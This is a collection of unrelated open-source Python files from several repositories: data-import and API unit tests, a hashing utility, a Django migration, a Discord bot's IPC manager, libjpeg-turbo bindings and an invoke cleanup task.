expected_keys = [
'gs://gcp-public-data-nexrad-l2/1991/06/05/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910605160000_19910605235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606000000_19910606075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606080000_19910606155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606160000_19910606235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/07/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910607160000_19910607235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608000000_19910608075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608080000_19910608155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/09/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910609160000_19910609235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610000000_19910610075959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610080000_19910610155959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/22/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910622160000_19910622235959.tar',
'gs://gcp-public-data-nexrad-l2/1991/06/23/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910623000000_19910623075959.tar']
# Import folder
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06", parse=False)
assert len(keys) == 12
assert keys == expected_keys
# Import folder - slash at the end of path
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/", parse=False)
assert len(keys) == 12
assert keys == expected_keys
# Import folder - Invalid path
keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/somethingNonExistent/", parse=False)
assert len(keys) == 0
if __name__ == "__main__":
pyunit_utils.standalone_test(gcs_import)
else:
gcs_import()
|
koku/masu/util/hash.py | rubik-ai/koku | 157 | 12730014 | <filename>koku/masu/util/hash.py
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Hashing utility."""
import hashlib
from masu.exceptions import HasherError
class Hasher:
"""A utility class to create hashes."""
def __init__(self, hash_function, length=None, encoding="utf-8"):
"""Initialize the Hasher.
Args:
hash_function (str): String representation of hash function
Ex. 'md5'
length (int): The digest length for SHAKE algorithms
encoding (str): Encoding used to convert string to bytes
Returns:
(Hasher): the initialized Hasher
"""
self.length = length
self.hash_function = hash_function
self.encoding = encoding
def get_hash_function(self):
"""Get the hash function."""
return self._hash_function
def set_hash_function(self, hash_function):
"""Set the hash function used.
Args:
hash_function (str): String representation of hash function
Ex. 'md5'
Returns:
(hashlib hash function)
"""
if "shake" in hash_function and not self.length:
errmsg = f"{hash_function} requires length to be set"
raise HasherError(errmsg)
self._hash_function = getattr(hashlib, hash_function, None)
if not self._hash_function:
errmsg = f"{hash_function} is not currently supported."
if hash_function in hashlib.algorithms_guaranteed:
errmsg = f"{hash_function} needs Hasher implementation."
raise HasherError(errmsg)
def hash_string_to_hex(self, string):
"""Return a hex digest of the hashed string.
Args:
string (str): The string to be hashed
Returns:
(str): The hex string of the hash
"""
if self.length:
return self.hash_function(string.encode(self.encoding)).hexdigest(self.length)
return self.hash_function(string.encode(self.encoding)).hexdigest()
hash_function = property(get_hash_function, set_hash_function)
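# Hedged usage sketch (not part of the original koku module above): exercises the Hasher
# API exactly as documented by its docstrings; the algorithm names and sample string are
# illustrative only.
if __name__ == "__main__":
    fixed_length = Hasher(hash_function="sha256")
    print(fixed_length.hash_string_to_hex("report-row-1"))     # 64-character hex digest
    variable_length = Hasher(hash_function="shake_128", length=16)
    print(variable_length.hash_string_to_hex("report-row-1"))  # 32-character hex digest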
|
dialogue-engine/test/programytest/storage/stores/sql/dao/test_node.py | cotobadesign/cotoba-agent-oss | 104 | 12730018 | <reponame>cotobadesign/cotoba-agent-oss<gh_stars>100-1000
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.sql.dao.node import PatternNode
from programy.storage.stores.sql.dao.node import TemplateNode
class PatternNodeTests(unittest.TestCase):
def test_init(self):
node1 = PatternNode(name='name', node_class='class')
self.assertIsNotNone(node1)
self.assertEqual("<Pattern Node(id='n/a', name='name', node_class='class')>", str(node1))
node2 = PatternNode(id=1, name='name', node_class='class')
self.assertIsNotNone(node2)
self.assertEqual("<Pattern Node(id='1', name='name', node_class='class')>", str(node2))
class TemplateNodeTests(unittest.TestCase):
def test_init(self):
node1 = TemplateNode(name='name', node_class='class')
self.assertIsNotNone(node1)
self.assertEqual("<Template Node(id='n/a', name='name', node_class='class')>", str(node1))
node2 = TemplateNode(id=1, name='name', node_class='class')
self.assertIsNotNone(node2)
self.assertEqual("<Template Node(id='1', name='name', node_class='class')>", str(node2))
|
InvenTree/build/migrations/0030_alter_build_reference.py | carlos-riquelme/InvenTree | 656 | 12730024 | <reponame>carlos-riquelme/InvenTree<filename>InvenTree/build/migrations/0030_alter_build_reference.py
# Generated by Django 3.2.4 on 2021-07-08 14:14
import InvenTree.validators
import build.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('build', '0029_auto_20210601_1525'),
]
operations = [
migrations.AlterField(
model_name='build',
name='reference',
field=models.CharField(default=build.models.get_next_build_number, help_text='Build Order Reference', max_length=64, unique=True, validators=[InvenTree.validators.validate_build_order_reference], verbose_name='Reference'),
),
]
|
test/hummingbot/connector/derivative/binance_perpetual/test_binance_perpetual_web_utils.py | pecuniafinance/hummingbot | 542 | 12730050 | <reponame>pecuniafinance/hummingbot
import asyncio
import unittest
from typing import Awaitable
import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils as web_utils
import hummingbot.connector.derivative.binance_perpetual.constants as CONSTANTS
from hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils import (
BinancePerpetualRESTPreProcessor,
)
from hummingbot.connector.time_synchronizer import TimeSynchronizer
from hummingbot.core.web_assistant.connections.data_types import RESTMethod, RESTRequest
from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory
class BinancePerpetualWebUtilsUnitTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.ev_loop = asyncio.get_event_loop()
cls.pre_processor = BinancePerpetualRESTPreProcessor()
def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
ret = self.ev_loop.run_until_complete(asyncio.wait_for(coroutine, timeout))
return ret
def test_binance_perpetual_rest_pre_processor_non_post_request(self):
request: RESTRequest = RESTRequest(
method=RESTMethod.GET,
url="/TEST_URL",
)
result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request))
self.assertIn("Content-Type", result_request.headers)
self.assertEqual(result_request.headers["Content-Type"], "application/x-www-form-urlencoded")
def test_binance_perpetual_rest_pre_processor_post_request(self):
request: RESTRequest = RESTRequest(
method=RESTMethod.POST,
url="/TEST_URL",
)
result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request))
self.assertIn("Content-Type", result_request.headers)
self.assertEqual(result_request.headers["Content-Type"], "application/json")
def test_rest_url_main_domain(self):
path_url = "/TEST_PATH_URL"
expected_url = f"{CONSTANTS.PERPETUAL_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}"
self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2))
self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2))
def test_rest_url_testnet_domain(self):
path_url = "/TEST_PATH_URL"
expected_url = f"{CONSTANTS.TESTNET_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}"
self.assertEqual(
expected_url, web_utils.rest_url(path_url=path_url, domain="testnet", api_version=CONSTANTS.API_VERSION_V2)
)
def test_wss_url_main_domain(self):
endpoint = "TEST_SUBSCRIBE"
expected_url = f"{CONSTANTS.PERPETUAL_WS_URL}{endpoint}"
self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint))
def test_wss_url_testnet_domain(self):
endpoint = "TEST_SUBSCRIBE"
expected_url = f"{CONSTANTS.TESTNET_WS_URL}{endpoint}"
self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint, domain="testnet"))
def test_build_api_factory(self):
api_factory = web_utils.build_api_factory(
time_synchronizer=TimeSynchronizer(),
time_provider=lambda: None,
)
self.assertIsInstance(api_factory, WebAssistantsFactory)
self.assertIsNone(api_factory._auth)
self.assertTrue(2, len(api_factory._rest_pre_processors))
|
tests/pyccel/project_rel_imports/runtest.py | dina-fouad/pyccel | 206 | 12730065 | # pylint: disable=missing-function-docstring, missing-module-docstring/
from project.folder2.mod3 import one_hundred_plus_sum_to_n_squared
if __name__ == '__main__':
print(one_hundred_plus_sum_to_n_squared(4))
|
villager-bot/karen.py | Villager-Dev/Villager-Bot | 122 | 12730101 | from concurrent.futures import ProcessPoolExecutor
from collections import defaultdict
from classyjson import ClassyDict
import asyncio
import asyncpg
import psutil
import arrow
from util.ipc import Server, PacketType, PacketHandlerRegistry, handle_packet
from util.setup import load_secrets, load_data, setup_karen_logging
from util.cooldowns import CooldownManager, MaxConcurrencyManager
from util.code import execute_code, format_exception
from util.misc import MultiLock
from bot import run_cluster
class MechaKaren(PacketHandlerRegistry):
class Share:
def __init__(self):
self.start_time = arrow.utcnow()
self.mine_commands = defaultdict(int) # {user_id: command_count}, also used for fishing btw
self.trivia_commands = defaultdict(int) # {user_id: trivia_command_count}
self.active_effects = defaultdict(set) # {user_id: [effect, potion, effect,..]}
self.pillages = defaultdict(int) # {user_id: num_successful_pillages}
self.econ_paused_users = {} # {user_id: time.time()}
def __init__(self):
self.k = load_secrets()
self.d = load_data()
self.v = self.Share()
self.logger = setup_karen_logging()
self.db = None
self.cooldowns = CooldownManager(self.d.cooldown_rates)
self.concurrency = MaxConcurrencyManager()
self.pillage_lock = MultiLock()
self.server = Server(self.k.manager.host, self.k.manager.port, self.k.manager.auth, self.get_packet_handlers())
self.shard_ids = tuple(range(self.k.shard_count))
self.online_shards = set()
self.eval_env = {"karen": self, **self.v.__dict__}
self.broadcasts = {} # {broadcast_id: {ready: asyncio.Event, responses: [response, response,..]}}
self.dm_messages = {} # {user_id: {event: asyncio.Event, content: "contents of message"}}
self.current_id = 0
self.commands = defaultdict(int)
self.commands_lock = asyncio.Lock()
self.commands_task = None
self.heal_users_task = None
self.clear_trivia_commands_task = None
self.reminders_task = None
@handle_packet(PacketType.MISSING_PACKET)
async def handle_missing_packet(self, packet: ClassyDict):
try:
packet_type = PacketType(packet.get("type"))
except ValueError:
packet_type = packet.get("type")
self.logger.error(f"Missing packet handler for packet type {packet_type}")
@handle_packet(PacketType.SHARD_READY)
async def handle_shard_ready_packet(self, packet: ClassyDict):
self.online_shards.add(packet.shard_id)
if len(self.online_shards) == len(self.shard_ids):
self.logger.info(f"\u001b[36;1mALL SHARDS\u001b[0m [0-{len(self.online_shards)-1}] \u001b[36;1mREADY\u001b[0m")
@handle_packet(PacketType.SHARD_DISCONNECT)
async def handle_shard_disconnect_packet(self, packet: ClassyDict):
self.online_shards.discard(packet.shard_id)
@handle_packet(PacketType.EVAL)
async def handle_eval_packet(self, packet: ClassyDict):
try:
result = eval(packet.code, self.eval_env)
success = True
except Exception as e:
result = format_exception(e)
success = False
self.logger.error(result)
return {"type": PacketType.EVAL_RESPONSE, "result": result, "success": success}
@handle_packet(PacketType.EXEC)
async def handle_exec_packet(self, packet: ClassyDict):
try:
result = await execute_code(packet.code, self.eval_env)
success = True
except Exception as e:
result = format_exception(e)
success = False
self.logger.error(result)
return {"type": PacketType.EXEC_RESPONSE, "result": result, "success": success}
@handle_packet(PacketType.BROADCAST_REQUEST)
async def handle_broadcast_request_packet(self, packet: ClassyDict):
"""broadcasts the packet to every connection including the broadcaster, and waits for responses"""
broadcast_id = f"b{self.current_id}"
self.current_id += 1
broadcast_packet = {**packet.packet, "id": broadcast_id}
broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections]
broadcast = self.broadcasts[broadcast_id] = {
"ready": asyncio.Event(),
"responses": [],
"expects": len(broadcast_coros),
}
await asyncio.wait(broadcast_coros)
await broadcast["ready"].wait()
return {"type": PacketType.BROADCAST_RESPONSE, "responses": broadcast["responses"]}
@handle_packet(PacketType.BROADCAST_RESPONSE)
async def handle_broadcast_response_packet(self, packet: ClassyDict):
broadcast = self.broadcasts[packet.id]
broadcast["responses"].append(packet)
if len(broadcast["responses"]) == broadcast["expects"]:
broadcast["ready"].set()
@handle_packet(PacketType.COOLDOWN)
async def handle_cooldown_packet(self, packet: ClassyDict):
cooldown_info = self.cooldowns.check(packet.command, packet.user_id)
return {"type": PacketType.COOLDOWN_RESPONSE, **cooldown_info}
@handle_packet(PacketType.COOLDOWN_ADD)
async def handle_cooldown_add_packet(self, packet: ClassyDict):
self.cooldowns.add_cooldown(packet.command, packet.user_id)
@handle_packet(PacketType.COOLDOWN_RESET)
async def handle_cooldown_reset_packet(self, packet: ClassyDict):
self.cooldowns.clear_cooldown(packet.command, packet.user_id)
@handle_packet(PacketType.DM_MESSAGE_REQUEST)
async def handle_dm_message_request_packet(self, packet: ClassyDict):
entry = self.dm_messages[packet.user_id] = {"event": asyncio.Event(), "content": None}
await entry["event"].wait()
self.dm_messages.pop(packet.user_id, None)
return {"type": PacketType.DM_MESSAGE, "content": entry["content"]}
@handle_packet(PacketType.DM_MESSAGE)
async def handle_dm_message_packet(self, packet: ClassyDict):
entry = self.dm_messages.get(packet.user_id)
if entry is None:
return
entry["content"] = packet.content
entry["event"].set()
@handle_packet(PacketType.MINE_COMMAND)
async def handle_mine_command_packet(self, packet: ClassyDict): # used for fishing too
self.v.mine_commands[packet.user_id] += packet.addition
return {"type": PacketType.MINE_COMMAND_RESPONSE, "current": self.v.mine_commands[packet.user_id]}
@handle_packet(PacketType.MINE_COMMANDS_RESET)
async def handle_mine_commands_reset_packet(self, packet: ClassyDict):
self.v.mine_commands[packet.user] = 0
@handle_packet(PacketType.CONCURRENCY_CHECK)
async def handle_concurrency_check_packet(self, packet: ClassyDict):
return {
"type": PacketType.CONCURRENCY_CHECK_RESPONSE,
"can_run": self.concurrency.check(packet.command, packet.user_id),
}
@handle_packet(PacketType.CONCURRENCY_ACQUIRE)
async def handle_concurrency_acquire_packet(self, packet: ClassyDict):
self.concurrency.acquire(packet.command, packet.user_id)
@handle_packet(PacketType.CONCURRENCY_RELEASE)
async def handle_concurrency_release_packet(self, packet: ClassyDict):
self.concurrency.release(packet.command, packet.user_id)
@handle_packet(PacketType.COMMAND_RAN)
async def handle_command_ran_packet(self, packet: ClassyDict):
async with self.commands_lock:
self.commands[packet.user_id] += 1
@handle_packet(PacketType.ACQUIRE_PILLAGE_LOCK)
async def handle_acquire_pillage_lock_packet(self, packet: ClassyDict):
await self.pillage_lock.acquire(packet.user_ids)
return {}
@handle_packet(PacketType.RELEASE_PILLAGE_LOCK)
async def handle_release_pillage_lock_packet(self, packet: ClassyDict):
self.pillage_lock.release(packet.user_ids)
@handle_packet(PacketType.PILLAGE)
async def handle_pillage_packet(self, packet: ClassyDict):
self.v.pillages[packet.pillager] += 1
return {"pillager": self.v.pillages[packet.pillager] - 1, "victim": self.v.pillages[packet.victim] - 1}
@handle_packet(PacketType.FETCH_STATS)
async def handle_fetch_stats_packet(self, packet: ClassyDict):
proc = psutil.Process()
with proc.oneshot():
mem_usage = proc.memory_full_info().uss
threads = proc.num_threads()
return {"type": PacketType.STATS_RESPONSE, "stats": [mem_usage, threads, len(asyncio.all_tasks())] + [0] * 7}
@handle_packet(PacketType.TRIVIA)
async def handle_trivia_packet(self, packet: ClassyDict):
self.v.trivia_commands[packet.author] += 1
return {"do_reward": self.v.trivia_commands[packet.author] < 5}
async def commands_dump_loop(self):
try:
while True:
await asyncio.sleep(60)
if self.commands:
async with self.commands_lock:
commands_dump = list(self.commands.items())
user_ids = [(user_id,) for user_id in list(self.commands.keys())]
self.commands.clear()
await self.db.executemany(
'INSERT INTO users (user_id) VALUES ($1) ON CONFLICT ("user_id") DO NOTHING', user_ids
) # ensure users are in the database first
await self.db.executemany(
'INSERT INTO leaderboards (user_id, commands) VALUES ($1, $2) ON CONFLICT ("user_id") DO UPDATE SET "commands" = leaderboards.commands + $2 WHERE leaderboards.user_id = $1',
commands_dump,
)
except Exception as e:
self.logger.error(format_exception(e))
async def heal_users_loop(self):
while True:
await asyncio.sleep(32)
try:
await self.db.execute("UPDATE users SET health = health + 1 WHERE health < 20")
except Exception as e:
self.logger.error(format_exception(e))
async def clear_trivia_commands_loop(self):
while True:
await asyncio.sleep(10 * 60)
try:
self.v.trivia_commands.clear()
except Exception as e:
self.logger.error(format_exception(e))
async def remind_reminders_loop(self):
while True:
await asyncio.sleep(5)
try:
reminders = await self.db.fetch(
"DELETE FROM reminders WHERE at <= NOW() RETURNING channel_id, user_id, message_id, reminder"
)
for reminder in reminders:
broadcast_id = f"b{self.current_id}"
self.current_id += 1
broadcast_packet = {"type": PacketType.REMINDER, "id": broadcast_id, **reminder}
broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections]
broadcast = self.broadcasts[broadcast_id] = {
"ready": asyncio.Event(),
"responses": [],
"expects": len(broadcast_coros),
}
await asyncio.wait(broadcast_coros)
await broadcast["ready"].wait()
except Exception as e:
self.logger.error(format_exception(e))
with open("reminderrors.txt", "a+") as f:
f.write("\n" + format_exception(e) + "\n")
async def start(self, pp):
self.db = await asyncpg.create_pool(
host=self.k.database.host, # where db is hosted
database=self.k.database.name, # name of database
user=self.k.database.user, # database username
password=<PASSWORD>, # password which goes with user
max_size=3,
min_size=1,
)
await self.server.start()
self.cooldowns.start()
self.commands_task = asyncio.create_task(self.commands_dump_loop())
self.heal_users_task = asyncio.create_task(self.heal_users_loop())
self.clear_trivia_commands_task = asyncio.create_task(self.clear_trivia_commands_loop())
self.reminders_task = asyncio.create_task(self.remind_reminders_loop())
shard_groups = []
loop = asyncio.get_event_loop()
g = self.k.cluster_size
# calculate max connections to the db server per process allowed
# postgresql is usually configured to allow 100 max, so we use
# 75 to leave room for other programs using the db server
db_pool_size_per = 75 // (self.k.shard_count // g + 1)
for shard_id_group in [self.shard_ids[i : i + g] for i in range(0, len(self.shard_ids), g)]:
shard_groups.append(loop.run_in_executor(pp, run_cluster, self.k.shard_count, shard_id_group, db_pool_size_per))
await asyncio.wait(shard_groups)
self.cooldowns.stop()
self.commands_task.cancel()
self.heal_users_task.cancel()
self.clear_trivia_commands_task.cancel()
self.reminders_task.cancel()
await self.db.close()
def run(self):
with ProcessPoolExecutor(self.k.shard_count // self.k.cluster_size + 1) as pp:
asyncio.run(self.start(pp))
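# Hedged sketch (not part of the original villager-bot source above): a simplified,
# self-contained illustration of the decorator-registry pattern that MechaKaren uses via
# PacketHandlerRegistry / handle_packet. The real util.ipc implementation is not shown in
# this file, so everything below is an assumption made for illustration only.
def demo_handle_packet(packet_type):
    def decorator(func):
        func._handles = packet_type  # tag the coroutine with the packet type it serves
        return func
    return decorator

class DemoPacketHandlerRegistry:
    def get_packet_handlers(self):
        # collect every method tagged by the decorator into a {packet_type: handler} map
        return {
            getattr(self, name)._handles: getattr(self, name)
            for name in dir(self)
            if callable(getattr(self, name)) and hasattr(getattr(self, name), "_handles")
        }

class DemoKaren(DemoPacketHandlerRegistry):
    @demo_handle_packet("ping")
    async def handle_ping(self, packet):
        return {"type": "pong", "echo": packet}

if __name__ == "__main__":
    handlers = DemoKaren().get_packet_handlers()
    print(asyncio.run(handlers["ping"]({"n": 1})))  # {'type': 'pong', 'echo': {'n': 1}}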
|
src/jpeg4py/_py.py | ajkxyz/jpeg4py | 103 | 12730118 | <reponame>ajkxyz/jpeg4py<gh_stars>100-1000
"""
Copyright (c) 2014, Samsung Electronics Co.,Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of Samsung Electronics Co.,Ltd..
"""
"""
jpeg4py - libjpeg-turbo cffi bindings and helper classes.
URL: https://github.com/ajkxyz/jpeg4py
Original author: <NAME> <<EMAIL>>
"""
"""
Helper classes for libjpeg-turbo cffi bindings.
"""
import jpeg4py._cffi as jpeg
from jpeg4py._cffi import TJPF_RGB
import numpy
import os
class JPEGRuntimeError(RuntimeError):
def __init__(self, msg, code):
super(JPEGRuntimeError, self).__init__(msg)
self.code = code
class Base(object):
"""Base class.
Attributes:
lib_: cffi handle to loaded shared library.
"""
def __init__(self, lib_):
"""Constructor.
Parameters:
lib_: cffi handle to loaded shared library.
"""
if lib_ is None:
jpeg.initialize()
lib_ = jpeg.lib
self.lib_ = lib_
def get_last_error(self):
"""Returns last error string.
"""
return jpeg.ffi.string(self.lib_.tjGetErrorStr()).decode("utf-8")
class Handle(Base):
"""Stores tjhandle pointer.
Attributes:
handle_: cffi tjhandle pointer.
"""
def __init__(self, handle_, lib_):
"""Constructor.
Parameters:
handle_: cffi tjhandle pointer.
"""
self.handle_ = None
super(Handle, self).__init__(lib_)
self.handle_ = handle_
def release(self):
if self.handle_ is not None:
self.lib_.tjDestroy(self.handle_)
self.handle_ = None
class JPEG(Base):
"""Main class.
Attributes:
decompressor: Handle object for decompressor.
source: numpy array with source data,
either encoded raw jpeg which may be decoded/transformed or
or source image for the later encode.
width: image width.
height: image height.
subsampling: level of chrominance subsampling.
Static attributes:
decompressors: list of decompressors for caching purposes.
"""
decompressors = []
@staticmethod
def clear():
"""Clears internal caches.
"""
# Manually release cached JPEG decompressors
for handle in reversed(JPEG.decompressors):
handle.release()
del JPEG.decompressors[:]
def __init__(self, source, lib_=None):
"""Constructor.
Parameters:
source: source for JPEG operations (numpy array or file name).
"""
super(JPEG, self).__init__(lib_)
self.decompressor = None
self.width = None
self.height = None
self.subsampling = None
if hasattr(source, "__array_interface__"):
self.source = source
elif numpy.fromfile is not None:
self.source = numpy.fromfile(source, dtype=numpy.uint8)
else:
fin = open(source, "rb")
self.source = numpy.empty(os.path.getsize(source),
dtype=numpy.uint8)
fin.readinto(self.source)
fin.close()
def _get_decompressor(self):
if self.decompressor is not None:
return
try:
self.decompressor = JPEG.decompressors.pop(-1)
except IndexError:
d = self.lib_.tjInitDecompress()
if d == jpeg.ffi.NULL:
raise JPEGRuntimeError(
"tjInitDecompress() failed with error "
"string %s" % self.get_last_error(), 0)
self.decompressor = Handle(d, self.lib_)
def parse_header(self):
"""Parses JPEG header.
Fills self.width, self.height, self.subsampling.
"""
self._get_decompressor()
whs = jpeg.ffi.new("int[]", 3)
whs_base = int(jpeg.ffi.cast("size_t", whs))
whs_itemsize = int(jpeg.ffi.sizeof("int"))
n = self.lib_.tjDecompressHeader2(
self.decompressor.handle_,
jpeg.ffi.cast("unsigned char*",
self.source.__array_interface__["data"][0]),
self.source.nbytes,
jpeg.ffi.cast("int*", whs_base),
jpeg.ffi.cast("int*", whs_base + whs_itemsize),
jpeg.ffi.cast("int*", whs_base + whs_itemsize + whs_itemsize))
if n:
raise JPEGRuntimeError("tjDecompressHeader2() failed with error "
"%d and error string %s" %
(n, self.get_last_error()), n)
self.width = int(whs[0])
self.height = int(whs[1])
self.subsampling = int(whs[2])
def decode(self, dst=None, pixfmt=TJPF_RGB):
bpp = jpeg.tjPixelSize[pixfmt]
if dst is None:
if self.width is None:
self.parse_header()
sh = [self.height, self.width]
if bpp > 1:
sh.append(bpp)
dst = numpy.zeros(sh, dtype=numpy.uint8)
elif not hasattr(dst, "__array_interface__"):
raise ValueError("dst should be numpy array or None")
if len(dst.shape) < 2:
raise ValueError("dst shape length should 2 or 3")
if dst.nbytes < dst.shape[1] * dst.shape[0] * bpp:
raise ValueError(
"dst is too small to hold the requested pixel format")
self._get_decompressor()
n = self.lib_.tjDecompress2(
self.decompressor.handle_,
jpeg.ffi.cast("unsigned char*",
self.source.__array_interface__["data"][0]),
self.source.nbytes,
jpeg.ffi.cast("unsigned char*",
dst.__array_interface__["data"][0]),
dst.shape[1], dst.strides[0], dst.shape[0], pixfmt, 0)
if n:
raise JPEGRuntimeError("tjDecompress2() failed with error "
"%d and error string %s" %
(n, self.get_last_error()), n)
return dst
def __del__(self):
# Return decompressor to cache.
if self.decompressor is not None:
JPEG.decompressors.append(self.decompressor)
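# Hedged usage sketch (not part of the original jpeg4py module above): decodes one file
# with the JPEG class defined here. "photo.jpg" is a placeholder path supplied only for
# illustration.
if __name__ == "__main__":
    img = JPEG("photo.jpg")       # a numpy array of encoded bytes is also accepted
    img.parse_header()
    print(img.width, img.height)  # dimensions read from the JPEG header
    rgb = img.decode()            # numpy uint8 array of shape (height, width, 3)
    print(rgb.shape)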
|
tasks.py | imkevinxu/django-kevin | 250 | 12730126 | from invoke import task, run
from os.path import dirname, abspath
# Create scripted tasks to run in command-line here
# http://docs.pyinvoke.org/en/latest/
PROJECT_ROOT = '%s/{{ project_name }}' % dirname(abspath(__file__))
@task
def clean():
"""Clean up static, compiled, test, and log files"""
print("Deleting *.pyc files...")
run('find . -name *.pyc -delete')
print("Deleting collected static files...")
run('rm -rf %s/public' % PROJECT_ROOT)
print("Deleting compiled stylesheets...")
run('rm -rf %s/static/css/build' % PROJECT_ROOT)
print("Deleting compiled scripts...")
run('rm -rf %s/static/js/build' % PROJECT_ROOT)
run('rm -rf %s/static/js/tests/build' % PROJECT_ROOT)
print('Deleting compressed images...')
run('rm -rf %s/static/img/compressed' % PROJECT_ROOT)
print('Deleting test files...')
run('rm -rf tests/*')
run('rm -rf .coverage')
run('rm -rf _SpecRunner.html')
print('Deleting log files...')
run('rm -rf logs/*')
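# Hedged usage note (not part of the original tasks.py above): with Invoke's CLI the task
# defined here is typically run from the project root as `invoke clean` (or `inv clean`).
# A companion task in the same style is sketched below; the collectstatic command is an
# assumption based on this being a Django project template.
@task
def collectstatic():
    """Collect static files into the public directory (illustrative sketch)."""
    run('python manage.py collectstatic --noinput')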
|
backend/storage/test/server_log_test.py | xuantan/viewfinder | 645 | 12730151 | <reponame>xuantan/viewfinder
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Server log tests.
"""
__author__ = '<EMAIL> (<NAME>)'
import logging
import os
import re
import sys
import tempfile
import time
from functools import partial
from tornado import options, testing
from viewfinder.backend.storage.object_store import ObjectStore, InitObjectStore
from viewfinder.backend.storage.file_object_store import FileObjectStore
from viewfinder.backend.storage.server_log import BatchingLogHandler, LogBatch, LogBatchPersistor, InitServerLog, FinishServerLog
from viewfinder.backend.base import util, counters
from viewfinder.backend.base.testing import async_test, BaseTestCase
class _BadObjectStore(FileObjectStore):
"""A file object store which simply does not return requests for
puts. If 'fail_fast' is True, returns an error immediately.
"""
def __init__(self, bucket_name, temporary=False, fail_fast=False):
super(_BadObjectStore, self).__init__(bucket_name, temporary)
self._fail_fast = fail_fast
self._put_map = dict()
def Put(self, key, value, callback):
self._put_map[key] = value
if self._fail_fast:
raise Exception('failed to put key %s' % key)
def GetPutValue(self, key):
return self._put_map[key]
class _FakePersistor(object):
"""Fake log persistor - simply accepts batches without accepting them."""
def __init__(self):
self.batches = {}
self._handlers = []
def PersistLogBatch(self, batch):
self.batches[batch.Key()] = batch
